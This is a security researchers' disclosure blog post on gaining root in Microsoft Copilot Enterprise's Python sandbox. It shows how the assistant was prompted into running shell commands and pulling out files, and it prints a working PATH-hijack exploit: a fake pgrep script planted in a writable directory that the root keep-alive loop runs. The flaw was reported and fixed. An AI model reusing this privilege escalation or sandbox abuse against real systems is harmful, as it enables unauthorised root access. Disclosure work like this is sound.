How We Rooted Copilot

Jul 26, 2025 - 16:15

Back in April 2025, Microsoft silently pushed an update for Copilot Enterprise, enabling a live Python sandbox running Jupyter Notebook that can execute code in the backend. Well, that sounds like a terrific idea, let’s explore it for a bit!

It turns out to be easy to have it execute exactly the code we want on the underlying system, using the Jupyter Notebook %command magic syntax.
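For illustration, a notebook cell along these lines (our own example; the exact prompts and commands vary) runs commands on the underlying system through IPython's magic and shell-escape syntax:

# Illustrative Jupyter cell: %-magics and ! shell escapes execute
# commands on the underlying system through the IPython kernel.
%env
!whoami
!ls -la /app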

Well, it worked most of the time. It feels like telling an 8-year-old child to do something. If it’s in a good mood (probably because it just had an ice cream), Copilot enthusiastically complies, but if it is hungry, it starts to become reluctant or passive-aggressively explains to you how the world works according to its vision.

Increasing our frustration tolerance by having some ice cream ourselves, we explore further. It seems to be executing Linux commands as the ‘ubuntu’ user in a miniconda environment. The funny thing is that the ubuntu user is in the sudo group, but there is no sudo binary on the filesystem. Copilot also seems to understand that and assists us with some context.

It uses quite a similar model to the ChatGPT sandbox, but with a newer kernel version, and Python 3.12 where ChatGPT was still running Python 3.11 (at least in April 2025).
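A few quick checks along these lines (our own illustration, run as shell escapes from a notebook cell) confirm the picture:

!id                       # confirms we run as 'ubuntu', member of the sudo group
!which sudo || echo "no sudo binary on the filesystem"
!uname -r                 # kernel version
!python3 --version        # Python 3.12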

The main functionality of the sandbox is running Jupyter Notebooks, together with a Tika server.

The container does seem to have a link-local network interface next to its loopback interface, limited to a /32 netmask and route.

We can see that it is using an OverlayFS filesystem that originates in some /legion file system path on the container host system.

Most custom scripts are located in the /app directory.
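Commands along the following lines (our own illustration; output omitted) surface these details:

!ip addr; ip route        # loopback plus a link-local interface with a /32 route
!mount | grep -i overlay  # OverlayFS layers originating under /legion on the host
!ls -la /app              # custom scripts and binaries shipped with the container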

After executing a lot of commands, it starts to really be in the mood to help out. It is then even possible to simply ask to download files or tar entire folders and provide them for download. Definitely don’t try this as the first command in a fresh session. It will throw a tantrum!

It does still somehow feel the need to corrupt any binary data. Another passive-aggressive trait? Text files or command output work fine though, so base64 encoding binary files before downloading them works. Most of the time.

It copies files to a working directory at /mnt/data, from where they can be picked up outside of the sandbox with a link that looks like blob:https://outlook.office.com/.
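A minimal sketch of that workaround, assuming we want to pull out one of the /app binaries (the target filename here is just our example):

# Base64-encode a binary into the /mnt/data working directory so it survives
# the download path; decode it locally with `base64 -d`.
import base64

with open('/app/goclientapp', 'rb') as f:
    encoded = base64.b64encode(f.read()).decode()

with open('/mnt/data/goclientapp.b64', 'w') as f:
    f.write(encoded)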

The goclientapp binary in /app is a Go binary that is the interface into this container. It opens a web server on port 6000 that listens for POST requests to the /execute endpoint. These POST requests come in as very simple JSON; for example, after asking it to execute the %env command, this JSON came in.

{"code":"%env"}

The goclientapp binary then executes the code in the Jupyter notebook environment and we get the output. There is also an httpproxy Go binary that seems to function as an HTTP proxy for outgoing web traffic originating from the Jupyter environment. The container did not enable any outgoing traffic (and ENABLE_EGRESS was false), so this binary was probably there for a future update that would potentially allow outgoing HTTP traffic.
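From inside the sandbox, a request in that format can be reproduced with a few lines of Python. This is a sketch based on the observed JSON, not a documented API:

# Sketch: replay the {"code": ...} request that goclientapp accepts on port 6000.
import json, urllib.request

payload = json.dumps({"code": "%env"}).encode()
req = urllib.request.Request(
    "http://localhost:6000/execute",
    data=payload,
    headers={"Content-Type": "application/json"},
)
with urllib.request.urlopen(req) as resp:
    print(resp.read().decode())  # output of the executed notebook cell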

An interesting script is entrypoint.sh in the /app directory. This seems to be the script that is executed as the entrypoint into the container, so this is running as root.

As can be seen on lines 42 and 55, the httpproxyapp and the goclientapp drop privileges and run as the ubuntu user. But on line 45 we see keepAliveJupyterSvc.sh being started as root.

Exciting! Let’s dive in.

Most further commands, on lines 10, 32, and 35, are run with dropped privileges. But can you spot the potential vulnerability?

Have a look at line 28 of the script, where it executes the following pgrep command.

JUPYTER_PID=$(pgrep -f "jupyter notebook --ip=0.0.0.0 --port=8888")

As this part of the script sits in a ‘while true’ loop, it is executed every two seconds. The pgrep command is invoked without a full path, which means the shell will search all directories in the $PATH variable for a pgrep binary. Going back to the output of the %env command, we see that the $PATH variable is populated with some custom paths.

PATH=/home/ubuntu/snenv/bin:/app/miniconda/condabin:/home/ubuntu/.cache/ms-playwright:
/home/ubuntu/snenv/bin:/app/miniconda/bin:/usr/bin/gcc:/usr/local/sbin:/usr/local/bin:
/usr/sbin:/usr/bin:/sbin:/bin

Interestingly, /app/miniconda/bin is writable by the ubuntu user and is listed before /usr/bin, where pgrep resides. And the root user has the same directory in its $PATH, before /usr/bin.
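A small helper (our own, not part of the sandbox) makes the hijack candidates explicit:

# List $PATH entries that are searched before /usr/bin and are writable,
# i.e. places where a rogue `pgrep` would shadow the real one.
import os

path_dirs = os.environ["PATH"].split(":")
for d in path_dirs[:path_dirs.index("/usr/bin")]:
    if os.path.isdir(d) and os.access(d, os.W_OK):
        print("writable and searched before /usr/bin:", d)
# /app/miniconda/bin qualifies here, and root has the same directory in its $PATH.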

We can now create a file in /app/miniconda/bin that looks like this.

#!/home/ubuntu/snenv/bin/python
# Fake pgrep, run as root every two seconds by keepAliveJupyterSvc.sh.
import os
if os.path.exists('/mnt/data/in'):          # only act when a command has been queued
    with open('/mnt/data/in', 'r') as fin, open('/mnt/data/out', 'a') as fout:
        fout.write(os.popen(fin.read()).read())  # run the command as root, append its output
print('1')  # fake PID so the keep-alive loop thinks Jupyter is still running

This small Python script checks for the existence of a file /mnt/data/in, reads the input, executes it with popen, and appends the output to /mnt/data/out. We upload it to Copilot by attaching it to a message, which puts the script at /mnt/data/pgrep.py, and have Copilot do the rest.
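The remaining steps look roughly like this (our reconstruction of what we asked Copilot to do; the paths are the ones described above):

# Stage the fake pgrep ahead of the real one in root's $PATH and hand root a command.
import os, shutil, time

shutil.copy('/mnt/data/pgrep.py', '/app/miniconda/bin/pgrep')
os.chmod('/app/miniconda/bin/pgrep', 0o755)

# The root keep-alive loop runs our pgrep within two seconds.
with open('/mnt/data/in', 'w') as f:
    f.write('id')

time.sleep(5)
print(open('/mnt/data/out').read())  # uid=0(root) gid=0(root) ...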

Now what have we gained with root access to the container?

Absolutely nothing!

We can now use this access to explore parts of the container that were previously inaccessible to us. We explored the filesystem, but there were no files in /root, no interesting logging to find, and a container breakout looked out of the question as every possible known breakout had been patched.

But at least we had fun!

We reported the vulnerability to Microsoft in April, and they have since fixed it, classifying it as a moderate severity vulnerability. As only important and critical vulnerabilities qualify for a bounty award, we did not receive anything, except for an acknowledgement on the Security Researcher Acknowledgments for Microsoft Online Services webpage.

Want to know how we also got access to the Responsible AI Operations control panel, where we could administer Copilot and 21 other internal Microsoft services?

Come see our talk Consent & Compromise: Abusing Entra OAuth for Fun and Access to Internal Microsoft Applications at BlackHat USA 2025, Thursday August 7th at 1:30 PM in Las Vegas.

Timeline

April 18th 2025 – Vulnerability reported to MSRC

July 25th 2025 – MSRC notifies that the issue has been fixed

July 25th 2025 – MSRC closes the case as a moderate severity vulnerability

July 25th 2025 – Blog published

About Eye Security

We are a European cybersecurity company focused on 24/7 threat monitoring, incident response, and cyber insurance. Our research team performs proactive scans and threat intelligence operations across the region to defend our customers and their supply chains.

Learn more at https://eye.security/ and follow us on LinkedIn to help us spread the word.
